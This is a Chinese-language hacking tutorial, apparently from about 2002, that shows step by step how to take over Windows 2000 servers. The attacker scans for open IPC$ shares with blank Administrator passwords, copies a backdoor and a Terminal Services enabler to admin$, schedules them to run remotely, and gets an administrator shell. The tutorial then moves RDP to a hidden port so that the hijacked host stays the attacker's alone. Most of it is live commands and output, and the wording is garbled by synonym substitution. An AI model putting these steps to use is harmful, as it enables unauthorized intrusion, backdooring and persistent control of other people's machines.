快捷搜索:

怎样从ipc$到开放3389到最后3389只为你服务!

对象:流光4.7 (http://www.heibai.net/download/show.php?id=2277&down=1)

Wollf v1.6 (http://www.heibai.net/download/show.php?id=2996&down=1)

HBULOT (http://www.heibai.net/download/show.php?id=2951&down=1)

本机平台:2000/NT

目标平台:2000/NT

以上对象在诟谇均能找到,详细应用措施会在文章中会先容。

首先打开流光(假如你连流光都没听过过的话,我想你没需要看这篇文章),Ctrl+A,填上一段ip,选择IPC扫

描。过一会有结果了:

218.22.155.* (SERVER)

--------------------------------------------------------------------------------

IPC扫描

得到共享列表

g f e h I

得到用户列表

029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser

猜解胜使用户帐号 Administrator (Admin):(NULL)

随便找了一台做实验,先ipc$连上再说。

==========================================================================================

C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us

er:administrator----------------连接成功!

敕令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi

n$------------------------------拷贝wollf.exe到目标谋略机的admin$目录

已复制 1 个文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm

in$-----------------------------拷贝hbulot.exe到目标谋略机的admin$目录

已复制 1 个文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*

\\218.22.155.* 确当前光阴是 2002/12/1 上午 06:37

敕令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe

新加了一项功课,其功课 ID = 1--指定wollf.exe在06:39运行

------------------------------------------------------------------------------------------

阐明:

wollf.exe是一个后门法度榜样,很多高手都爱好nc或者winshell,不过我对他情有独钟!在这里我只先容与本文内

容有关的敕令参数,它的高档用法不做弥补。

hbulot.exe是用于开启3389办事,假如不是server及以上版本,就不要运行了。由于pro版不能安装终端办事。

2分钟后......

==========================================================================================

C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614

"Wollf Remote Manager" v1.6

Code by wollf, http://www.xfocus.org

------------------------------------------------------------------------------------------

阐明:

应用wollf连接时要留意wollf.exe要在当前目录,它的连接敕令款式:wollf -connect IP 7614

7614是wollf开放的端口。假如显示如上,阐明你已经连接成功,并具有治理员administrator权限。

==========================================================================================

[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

------------------------------------------------------------------------------------------

阐明:

输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。

==========================================================================================

D:\WINNT\system32>cd..

cd..

D:\WINNT>dir h*.*

dir h*.*

驱动器 D 中的卷没有标签。

卷的序列号是 1CE5-2615

D:\WINNT 的目录

2002-11-27 03:07Help

2002-09-10 12:16 10,752 hh.exe

2002-10-01 08:29 24,576 HBULOT.exe

2 个文件 35,328 字节

1 个目录 9,049,604,096 可用字节

D:\WINNT>hbulot

hbulot

------------------------------------------------------------------------------------------

阐明:

由于我们把HBULOT.exe放到目标机的admin$下的,以是先找到它,以上是文件的寄放位置。

==========================================================================================

D:\WINNT>exit

exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot

Command "REBOOT" succeed.

[server@D:\WINNT\system32]#

Connection closed.

------------------------------------------------------------------------------------------

阐明:

由dos退到wollf的连接模式下用exit敕令,HBULOT.exe运行后需从新启动方可生效,这里wollf自带的REBOOT

敕令,履行过在5秒后你就会掉去连接。启动完毕后反省一下3389端口是否开放,措施很多,superscan3扫一下

。这时刻你就可以登岸了。假如没有开放3389那就不是server及以上版本,就不要运行了。由于pro版不能安装

终端办事。

到这里,你已经拥有3389肉鸡了!然则会不会被其余入侵者发明呢?下面所教的便是怎么让3389只为你办事!

我们现在应用的3389登岸器有两种版本,一种是2000/98,一种是XP。二者差别呢?前者应用的默认端口3389对

目标,后者默认的也是3389端口,然则它还支持其余端口进行连接!以是呢......我们来改动3389的连接端口

来躲过通俗扫描器的扫描!改动措施如下:

改动办事器真个端口设置 ,注册表有2个地方必要改动。

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

PortNumber值,默认是3389,改动成所盼望的端口,比如1314

第二个地方:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

PortNumber值,默认是3389,改动成所盼望的端口,比如1314

现在这样就可以了。重启系统吧。

留意:事实上,只改动第二处也是可以的。别的,第二处的标准联络应该是

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\

表示详细的某个RDP-TCP贯穿毗连。

重启过后,看看端口有没有改。

小技术:改动注册表键值时,先选择10进制,输入你盼望的端口数值,再选择16进制,系统会自动转换。

您可能还会对下面的文章感兴趣: